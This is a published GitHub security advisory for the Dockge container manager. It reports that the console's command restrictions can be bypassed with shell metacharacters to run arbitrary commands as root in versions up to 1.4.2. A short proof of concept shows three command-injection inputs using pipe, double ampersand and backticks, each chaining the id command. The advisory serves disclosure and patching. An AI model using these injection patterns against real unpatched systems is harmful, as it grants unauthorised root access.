
Dockge Console Injection

High
louislam published GHSA-7vx4-hf96-mqq6 Mar 31, 2025

Package

dockge

Affected versions

<= 1.4.2

Patched versions

1.5.0

Description

Summary

Sorry, I was unable to post this to the dockge repo as I got a 404.
The dockge console limits the available commands but it is possible to bypass these controls and execute arbitrary commands.

Details

Using shell metacharacters such as `, &, and | allows additional commands to be run.

PoC

root@8f4c2fe8e8b4:/home/bob/docker# ls | id
uid=0(root) gid=0(root) groups=0(root)

root@8f4c2fe8e8b4:/home/bob/docker# ls && id
[removed]
uid=0(root) gid=0(root) groups=0(root)

root@8f4c2fe8e8b4:/home/bob/docker# ls `id`
ls: cannot access 'uid=0(root)': No such file or directory
ls: cannot access 'gid=0(root)': No such file or directory
ls: cannot access 'groups=0(root)': No such file or directory

Impact

Ability to run any command with root privileges.

Severity

High

CVE ID

No known CVE

Weaknesses

No CWEs

Credits